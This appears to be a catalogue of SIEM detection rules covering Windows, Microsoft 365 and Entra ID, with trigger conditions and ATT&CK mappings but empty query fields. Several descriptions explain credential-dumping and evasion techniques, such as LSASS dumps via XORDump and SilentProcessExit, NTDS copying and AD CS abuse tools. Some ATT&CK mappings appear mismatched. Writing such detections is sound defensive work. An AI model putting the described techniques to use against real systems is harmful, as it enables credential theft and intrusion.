ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Security Health Disable via Registry Modification
Trigger Condition: This alert is triggered whenever Windows Security Health registry values are added/modified to set it to a disabled state.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Windows User Account Created via Command Line
Trigger Condition: This alert is triggered whenever the creation of a user account via CLI like PowerShell or via net utility is detected. The creation of a user account is a process by which a user or administrator creates a new user profile on a system. Attackers may create new user accounts to maintain or enhance their access to a system or domain. This can be used as a means of persistence, where the attacker can maintain access to a compromised system even if their initial access is detected and removed. Alternatively, the attacker may create new accounts with elevated privileges to expand their access to additional resources or systems. Effective monitoring and access controls can help detect and prevent unauthorized account creation and mitigate the risks associated with this type of attack.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_XSL Script Processing Detected
Trigger Condition: This alert is triggered whenever an application control bypass attempt via execution of embedded scripts inside Extensible Stylesheet Language (XSL) files is detected. This alert also detects another variation of this technique, dubbed “SquiblyTwo”, that uses WMI to invoke JScript or VBScript within an XSL file. XSL stands for Extensible Stylesheet Language and is used to express style sheets; it supports scripting to format XML files. Adversaries may abuse XSL to bypass application whitelisting and execute arbitrary code because of this legitimate functionality.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: Inbox rule configured in Microsoft Exchange to manipulate incoming emails containing specific terms like phish, malware and alert.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Email Hiding Rules
ATT&CK ID: T1564.008
Minimum Log Source Requirement: Office365
Query:
LP_Successful Microsoft 365 Login with Reconnaissance User Agents
Trigger Condition: User agents associated with known reconnaissance tools like AADInternals and AzureHound, presented during successful logins to Microsoft 365.
ATT&CK Category: Discovery
ATT&CK Tag: Permission Groups Discovery, Cloud Account, Cloud Service Discovery
ATT&CK ID: T1069, T1087.004, T1526
Minimum Log Source Requirement: Office365
Query:
LP_Sensitive Mail Read Application Permission Assigned
Trigger Condition: Application in Microsoft Entra ID (formerly Azure AD) with the Mail.Read permission granted.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_Multiple Exchange Mailboxes Accessed via API in Short Span
Trigger Condition: High number of mailboxes accessed via an API, such as Microsoft Graph API or Exchange Web Services, within a short period.
ATT&CK Category: Collection
ATT&CK Tag: Remote Email Collection
ATT&CK ID: T1114.002
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft Purview eDiscovery Activities
Trigger Condition: Microsoft Purview activities related to searching for files and data across all of SharePoint, Exchange and public folders via eDiscovery were performed, or the search results were exported. Microsoft Purview eDiscovery is a legal compliance tool that helps organizations search for, identify, collect, and export data for legal investigations, litigation and compliance audits.
ATT&CK Category: Collection, Exfiltration
ATT&CK Tag: Email Collection, Exfiltration Over Web Service
ATT&CK ID: T1114, T1567
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft Purview Audit Disabled
Trigger Condition: Microsoft Purview Audit (formerly Advanced Auditing) subscription removed from a user.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Cloud Logs
ATT&CK ID: T1562.008
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft 365 Unified Audit Logging Disabled
Trigger Condition: Disabling of Unified Audit Log in Microsoft 365 (formerly Office 365).
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Cloud Logs
ATT&CK ID: T1562.008
Minimum Log Source Requirement: Office365
Query:
LP_Microsoft 365 Multiple MFA Prompt Denied
Trigger Condition: User denied multiple MFA prompts.
ATT&CK Category: Credential Access
ATT&CK Tag: Multi-Factor Authentication Request Generation
ATT&CK ID: T1621
Minimum Log Source Requirement: Office365
Query:
LP_File with Suspicious Extension Sent in Microsoft Teams Message
Trigger Condition: File with a potentially dangerous extension, such as .exe, .bat and .ps1, shared within a Microsoft Teams chat or channel.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_File Shared to Guest in SharePoint
Trigger Condition: SharePoint file shared with an external guest user.
ATT&CK Category: Collection
ATT&CK Tag: Sharepoint
ATT&CK ID: T1213.002
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Mailbox Folder Delegation Configured
Trigger Condition: Addition of delegation permissions to the Exchange mailbox folders.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Mailbox Delegation Configured
Trigger Condition: Addition of delegation permissions to an Exchange mailbox.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions
ATT&CK ID: T1098.002
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Mailbox Audit Bypass Configured
Trigger Condition: Use of Set-MailboxAuditBypassAssociation cmdlet to exempt a user or service account from mailbox audit logging in Exchange Online.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Cloud Logs
ATT&CK ID: T1562.008
Minimum Log Source Requirement: Office365
Query:
LP_Exchange Email Auto Forward Enabled
Trigger Condition: Email auto-forwarding within Exchange mailbox which can lead to data leakage, especially if configured to send emails to external addresses without proper authorization.
ATT&CK Category: Collection
ATT&CK Tag: Email Forwarding Rule
ATT&CK ID: T1114.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID User Consent Denied for OAuth Application
Trigger Condition: User denied consent to an OAuth application requesting permissions.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal Application Access Token
ATT&CK ID: T1528
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Suspicious Permission Granted to Application
Trigger Condition: User granted consent to an application with suspicious privileges.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Cloud Roles
ATT&CK ID: T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Suspicious Authorization Policy Updated
Trigger Condition: Updated Entra ID/Azure AD authorization policy to grant user consent to apps identified as risky by Microsoft Entra ID Protection.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses
ATT&CK ID: T1562
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Privileged Role Assignment via PIM
Trigger Condition: Addition of a privileged role user through Microsoft Entra Privileged Identity Management (PIM).
ATT&CK Category: Persistence
ATT&CK Tag: Additional Cloud Roles
ATT&CK ID: T1098.003
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Privileged Role Assignment
Trigger Condition: Privileged role assigned to a user or a service principal in Entra ID.
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation, Additional Cloud Roles
ATT&CK ID: T1098, T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Privileged Application Role Assignment by Service Principal
Trigger Condition: Privileged application roles assigned to security principals in Entra ID by service principals.
ATT&CK Category: Persistence
ATT&CK Tag: Account Manipulation, Additional Cloud Roles
ATT&CK ID: T1098, T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID PowerShell Sign-In
Trigger Condition: User logged in using the Azure Active Directory PowerShell module, Azure CLI, or sign-ins using the Microsoft Graph PowerShell SDK.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Cloud API, Cloud Accounts
ATT&CK ID: T1059.009, T1078.004
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID New Owner Added to Service Principal or Application
Trigger Condition: Successful addition of a new owner to a service principal or application.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Additional Cloud Roles
ATT&CK ID: T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID High Risk User Sign-In
Trigger Condition: When Microsoft Entra ID Protection flags user sign-in activities as “at risk.”
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Full Access Permission Assigned to Application
Trigger Condition: User granted full access to Office and Office applications.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Email Delegate Permissions, Additional Cloud Roles
ATT&CK ID: T1098.002, T1098.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID External User Invited
Trigger Condition: External guest user invited within Entra ID.
ATT&CK Category: Persistence
ATT&CK Tag: Cloud Account
ATT&CK ID: T1136.003
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Device Code Authentication Detected
Trigger Condition: Successful authentication using a device code authenticator.
ATT&CK Category: Initial Access, Credential Access
ATT&CK Tag: Steal Application Access Token, Phishing
ATT&CK ID: T1528, T1566
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Credential Added to Application or Service Principal
Trigger Condition: Addition of a new credential, either a client secret or certificate, to an application or service principal within Microsoft Entra ID.
ATT&CK Category: Persistence
ATT&CK Tag: Additional Cloud Credentials
ATT&CK ID: T1098.001
Minimum Log Source Requirement: Office365
Query:
LP_Entra ID Conditional Access Policy Modification
Trigger Condition: Addition or update of a Microsoft Entra Conditional Access policy.
ATT&CK Category: Persistence
ATT&CK Tag: Conditional Access Policies
ATT&CK ID: T1556.009
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Conditional Access Policies Implementing MFA Deleted
Trigger Condition: When users deleted conditional access policies implementing Multi-Factor Authentication (MFA).
ATT&CK Category: Credential Access
ATT&CK Tag: Multi-Factor Authentication
ATT&CK ID: T1556.006
Minimum Log Source Requirement: EntraID
Query:
LP_Entra ID Conditional Access Policies Blocking Device Code Authentication Modified
Trigger Condition: When users deleted or modified conditional access policies preventing Device Code Authentication flow.
ATT&CK Category: Modify Authentication Process
ATT&CK Tag: Sharepoint
ATT&CK ID: T1556
Minimum Log Source Requirement: EntraID
Query:
LP_Creation of Anonymous Sharing Link in SharePoint
Trigger Condition: Creation of anonymous sharing links in SharePoint.
ATT&CK Category: Collection
ATT&CK Tag: Sharepoint
ATT&CK ID: T1213.002
Minimum Log Source Requirement: Office365
Query:
LP_Block Network Connections from EDR via WFP
Trigger Condition: When an Endpoint Detection and Response (EDR) network connection is blocked by the Windows Filtering Platform (WFP).
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses
ATT&CK ID: T1562
Minimum Log Source Requirement: Windows
Query:
LP_RDP Extension File Dropped in Outlook Folder
Trigger Condition: Creation of a file with .rdp extension in the Outlook folder.
ATT&CK Category: Initial Access, Lateral Movement
ATT&CK Tag: Remote Desktop Protocol, Spearphishing Attachment
ATT&CK ID: T1021.001, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File Creation with RTLO Character for Filename Obfuscation
Trigger Condition: Detects file creation events where filenames use the Right-to-Left Override (RLO) character (U+202E) to disguise malicious extensions (e.g., .msc or .exe) as legitimate document formats (e.g., .pdf, .docx).
ATT&CK Category: Initial Access, Defense Evasion
ATT&CK Tag: Right-to-Left Override, Spearphishing Attachment
ATT&CK ID: T1036.002, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious AutoIt Execution
Trigger Condition: Execution of AutoIt in a suspicious context. Adversaries leverage AutoIt for automation and payload delivery due to its flexibility and ability to evade detection.
ATT&CK Category: Execution
ATT&CK Tag: AutoHotKey & AutoIT
ATT&CK ID: T1059.010
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_CVE-2024-38112 Exploitation Detected
Trigger Condition: This alert is triggered whenever the svchost.exe process spawns an iexplore.exe process and that same iexplore.exe process drops an “.hta” file.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Certipy Tool Execution for AD CS Abuse
Trigger Condition: This rule detects the execution of Certipy, a hacktool commonly used for Active Directory Certificate Services (AD CS) abuse. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. Certipy is part of a suite of tools developed for Red Team operations and security testing. It allows attackers to interact with AD CS to enumerate and exploit configurations and vulnerabilities. It is particularly useful for abusing certificate templates, forging certificates, and performing privilege escalation attacks. Adversaries may use this tool to steal or forge certificates used for authentication to access remote systems or resources. False positives for this rule are unknown.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Authentication Certificates
ATT&CK ID: T1649
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Certify Tool Execution for AD CS Abuse
Trigger Condition: This rule detects the execution of Certify, a hacktool commonly used for Active Directory Certificate Services (AD CS) abuse. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. Certify is part of a suite of tools developed for Red Team operations and security testing. It allows attackers to interact with AD CS to enumerate and exploit configurations and vulnerabilities. It is particularly useful for abusing certificate templates, forging certificates, and performing privilege escalation attacks. Adversaries may use this tool to steal or forge certificates used for authentication to access remote systems or resources. False positives for this rule are unknown.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Authentication Certificates
ATT&CK ID: T1649
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Password Dumper Activity on LSASS
Trigger Condition: Process handle on the LSASS process with a specific access mask and SAM_DOMAIN object type. Tools like Mimikatz create a process handle on the LSASS process with an elevated access mask for dumping purposes. This alert detects Mimikatz lsadump attempts.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets
ATT&CK ID: T1003.004
Minimum Log Source Requirement: Windows
Query:
LP_Disabling of UAC Detected
Trigger Condition: Disabling of User Account Control (UAC) on the endpoint. Adversaries may disable UAC to execute code directly with high integrity.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Behavior Related to Named Pipe Impersonation
Trigger Condition: Suspicious events related to named pipe impersonation are detected, such as creating a named pipe, creating a service with a named pipe, and using a named pipe in the command line. Adversaries use named pipe impersonation for privilege escalation and to evade defense.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Access Token Manipulation
ATT&CK ID: T1134
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Usage of Ngrok Utility Detected
Trigger Condition: This alert is triggered whenever the execution of the Ngrok utility is detected. Ngrok is a cross-platform application that allows users to expose local servers behind NATs and firewalls to the public internet over secure tunnels. Threat actors often use Ngrok to expose internal services to the internet, such as making RDP publicly accessible. False positives could arise from other tools that use the same command line switches as Ngrok.
ATT&CK Category: Command and Control
ATT&CK Tag: Protocol Tunneling
ATT&CK ID: T1572
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Chrome Addition of VPN Extension
Trigger Condition: This alert rule detects the addition of a well-known VPN extension in Chrome. Extensions are small software programs that customize the browsing experience, while a VPN extension provides VPN functionality within the browser. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. False positives may occur when a VPN extension is added in Chrome for legitimate reasons. The list ‘CHROME_VPN_EXTENSIONS’ is required for this alert rule.
ATT&CK Category: Initial Access, Persistence
ATT&CK Tag: External Remote Services
ATT&CK ID: T1133
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Outlook Security Settings Change
Trigger Condition: Modification to Outlook configuration through creating a security registry key. Changes to configuration can allow adversaries to run macros covertly without notifying users.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Certutil Command Detected
Trigger Condition: Suspicious Certutil utility execution with parameters like decode or urlcache, which adversaries can use to download payloads from remote locations or encode/decode base64 obfuscated payloads.
ATT&CK Category: Defense Evasion, Command and Control
ATT&CK Tag: Ingress Tool Transfer, Deobfuscate/Decode Files or Information
ATT&CK ID: T1105, T1140
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Unsigned DLLs loaded by RunDLL32 or RegSvr32
Trigger Condition: Loading of an unsigned dynamic-link library (DLL), a common tactic attackers use to execute arbitrary code on Windows systems. Adversaries often leverage Windows built-in tools like RunDLL32 or RegSvr32 to execute malicious code through unsigned or untrusted DLLs.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Regsvr32, Rundll32
ATT&CK ID: T1218.010, T1218.011
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Terminal Service Configuration Modified
Trigger Condition: Modifying settings related to terminal services. Adversaries can use this technique to bypass authentication requirements or bypass security settings.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_System Service Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever usage of WMI for service reconnaissance is detected.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: System Service Discovery, Windows Management Instrumentation
ATT&CK ID: T1007, T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI for listing Processes running on the compromised host.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Windows Management Instrumentation, System Service Discovery
ATT&CK ID: T1047, T1007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Created through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI to spawn new processes either on local or remote host.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Local Users Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI for listing all local user accounts.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Windows Management Instrumentation, Local Account
ATT&CK ID: T1047, T1087.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Installed Software Updates Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI to list installed Software hotfix and patches.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Windows Management Instrumentation, Software Discovery
ATT&CK ID: T1047, T1518
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application uninstall via WMIC
Trigger Condition: This alert rule is triggered when the Windows Management Instrumentation Command-line (WMIC) tool is detected uninstalling applications on a system.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Windows Management Instrumentation, Disable or Modify Tools
ATT&CK ID: T1047, T1562.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_AppInit DLLs Detected
Trigger Condition: Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, AppInit DLLs
ATT&CK ID: T1546, T1546.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_High Severity EPP Alert
Trigger Condition: High or critical severity alert generated by any endpoint protection platform like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Host Generating Multiple Medium Severity EPP Alert
Trigger Condition: Multiple medium severity alerts generated by endpoint protection platforms like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Host Generating Multiple High Severity EPP Alert
Trigger Condition: Multiple high or critical severity alerts generated by endpoint protection platforms like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Medium Severity EPP Alert
Trigger Condition: Medium severity alert generated by any endpoint protection platform like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Windows Service Stop or Delete
Trigger Condition: Windows service or process being stopped, deleted or disabled via system binaries is detected. sc.exe, net.exe and net1.exe are Microsoft Windows system internal binaries that adversaries can use to stop or delete services and processes to render those services unavailable to legitimate users or to avoid hindrances in their attack chain.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Hack Tools Execution
Trigger Condition: This alert is triggered whenever it detects the execution of various Windows-based hacktools via their import hash (imphash), even if the files have been renamed. The list ‘MALICIOUS_TOOLS_IMPHASH’ must be imported before activating this alert.
ATT&CK Category: Credential Access, Resource Development
ATT&CK Tag: OS Credential Dumping, Tool
ATT&CK ID: T1003, T1588.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Execution of XORDump Utility for LSASS Memory Dump
Trigger Condition: This alert is triggered whenever it detects suspicious execution of the XORDump utility, commonly used for LSASS memory dumps. It is used to dump LSASS memory while also bypassing security measures like AV, EDR, etc. In some cases, lsass.exe minidump files are signatured by AV and deleted. The DLL loaded into this binary for minidumping (dbghelp) always writes the minidump to disk, but before the binary closes the file handle, it re-reads the contents into memory, closes the handle and immediately deletes the file. The output is then held in memory and passed to an XOR function, which writes the XOR’d data back to disk, from where it can be exfiltrated without triggering signatures. Adversaries may use this tool to steal LSASS minidump files stealthily, bypassing security controls.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of Createdump Utility for Memory Dump
Trigger Condition: This alert is triggered whenever it detects the usage of the createdump.exe LOLBIN utility to dump process memory. createdump.exe is the Microsoft .NET Runtime Crash Dump Generator (included in .NET Core). Attackers often leverage this utility to dump LSASS process memory while also evading defenses. lsass.exe, which stands for Local Security Authority Subsystem Service, is a crucial Windows system process responsible for various security-related functions, including user authentication and managing security policies. Adversaries often seek to dump the lsass.exe process memory because it contains sensitive information, such as user credentials and authentication tokens.
ATT&CK Category: Credential Access, Defense Evasion
ATT&CK Tag: LSASS Memory, Masquerading
ATT&CK ID: T1003.001, T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious DsInternals Get-ADReplAccount Activities
Trigger Condition: Suspicious activities related to Get-ADReplAccount from the DSInternals PowerShell module are detected. Adversaries may use this tool to maliciously access Domain Controllers’ credentials. For event ID 4104, PowerShell Script Block Logging is required.
ATT&CK Category: Credential Access
ATT&CK Tag: DCSync
ATT&CK ID: T1003.006
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Activities Associated with NTDS Exfiltration
Trigger Condition: This alert is triggered whenever it detects suspicious activities related to the Active Directory Domain Database (ntds.dit). NTDS file is present in the DC and contains sensitive information such as Active Directory data, including credentials, information about user objects, groups, and group membership. Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.
ATT&CK Category: Credential Access
ATT&CK Tag: NTDS
ATT&CK ID: T1003.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible LSASS Memory Dump Via Windows Task Manager
Trigger Condition: Creation of a lsass.dmp file by the taskmgr process is detected. Adversaries often seek to dump the lsass.exe process memory because it contains sensitive information, such as user credentials and authentication tokens.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible LSASS Dump Via SilentProcessExit Technique
Trigger Condition: This alert is triggered whenever it detects a possible LSASS dump via the SilentProcessExit technique. It detects changes to the registry in which a monitor program gets registered to dump the memory of the lsass.exe process. The SilentProcessExit method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios: either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_NTDS or SAM Database Copy Operation
Trigger Condition: Copy operation of Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files is detected. Adversaries may attempt to access or create a copy of the Active Directory domain database or SAM database to steal credential information and obtain other information about domain members, such as devices, users and access rights.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, Security Account Manager, NTDS
ATT&CK ID: T1003, T1003.002, T1003.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Microsoft IIS Service Account Password Dumped
Trigger Condition: This alert is triggered whenever it detects the execution of the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Dumpert Process Dumper Execution
Trigger Condition: This alert is triggered whenever it detects the use of Dumpert process dumper, which dumps the lsass.exe process memory. lsass.exe, which stands for Local Security Authority Subsystem Service, is a crucial Windows system process responsible for various security-related functions, including user authentication and managing security policies. Adversaries often seek to dump the lsass.exe process memory because it contains sensitive information, such as user credentials and authentication tokens. By extracting this information from lsass.exe, attackers can potentially gain unauthorized access to a system or escalate their privileges, making it a high-value target for malicious actors. Detecting and preventing such memory dumps is critical to safeguarding the security of a Windows system.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Dump Via NPPSpy
Trigger Condition: Dumping of a possible credential via a tool called NPPSpy is detected. NPPSpy is a Network Provider/Credential Manager DLL that extracts credentials and stores them in plain text. This alert monitors file creation, registry manipulation and process creation events that indicate a potential credential dump via NPPSpy.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious PowerShell Commandlets Detected
Trigger Condition: Execution of malicious PowerShell commandlets.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: PowerShell, Windows
Query:
LP_Suspicious Base64 Encoded PowerShell Command
Trigger Condition: Execution of suspicious base64 encoded commands via PowerShell.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows, PowerShell, Windows Sysmon
Query:
LP_Code Execution Via Diskshadow Detected
Trigger Condition: Usage of the diskshadow binary to execute code from a file is detected. Adversaries can use diskshadow with the -s or /s flag to execute commands from a script file and bypass detection.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Image Mount Indicator in Recent Files
Trigger Condition: Recent element files pointing to .iso, .img, .vhd or .vhdx files are detected. These image files are used in phishing attacks to deliver malware and circumvent the Mark of the Web (MotW) in Windows to execute malicious commands. This may produce false positives on server systems, but on workstations, users rarely mount .iso or .img files.
ATT&CK Category: Initial Access, Defense Evasion
ATT&CK Tag: Mark-of-the-Web Bypass, Spearphishing Attachment
ATT&CK ID: T1553.005, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Disk Image File Created
Trigger Condition: Image files with extensions like .iso, .vhd, and .vhdx are downloaded from the internet into a user’s download or temporary folder. Adversaries often deliver their malware payloads through a .iso file format to bypass the Mark of the Web (MotW) in Windows and execute their payload successfully.
ATT&CK Category: Initial Access, Defense Evasion
ATT&CK Tag: Mark-of-the-Web Bypass, Spearphishing Attachment
ATT&CK ID: T1553.005, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_PowerShell Execution via DLL Detected
Trigger Condition: Execution of PowerShell via DLL instead of powershell.exe is detected. PowerShell is a command-line shell used in Windows. Adversaries can execute PowerShell for malicious activities even if powershell.exe is blocked and no strict application whitelisting is implemented.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Rundll32
ATT&CK ID: T1059.001, T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Windows Defender Registry keys Modification
Trigger Condition: Changes in the Windows Defender registry settings to disable Windows Defender functionalities. Adversaries try to alter Windows Defender-associated registries to disable protection and detection features.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Tools
ATT&CK ID: T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Executable Files Created and Executed by Office Applications
Trigger Condition: Executable file dropped or modified via office applications and executed within a specific time range.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Backdoor in Exchange Transport Agent
Trigger Condition: This alert is triggered whenever it detects a WMI backdoor in Exchange Transport Agents (ETA) via WMI event filters. Microsoft Exchange Server’s Exchange Transport Agents enable customization and expansion of the mail flow process and are in charge of checking, processing and altering messages as they move through the transport pipeline of the Exchange Server. Adversaries plant WMI backdoors in ETA using WMI event filters in order to maintain persistence or privilege escalation.
ATT&CK Category: Persistence
ATT&CK Tag: Event Triggered Execution, Windows Management Instrumentation Event Subscription
ATT&CK ID: T1546, T1546.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Msiexec Usage Detected
Trigger Condition: A .msi file executed from a publicly writable folder, or a command prompt or PowerShell spawned by msiexec, is detected. Adversaries can use this technique to execute their payload while evading defenses.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Msiexec
ATT&CK ID: T1218.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of Advanced IP Scanner
Trigger Condition: Suspicious usage of Advanced IP Scanner is detected.
ATT&CK Category: Reconnaissance, Discovery
ATT&CK Tag: Network Service Discovery, Network Share Discovery, Gather Victim Network Information
ATT&CK ID: T1046, T1135, T1590
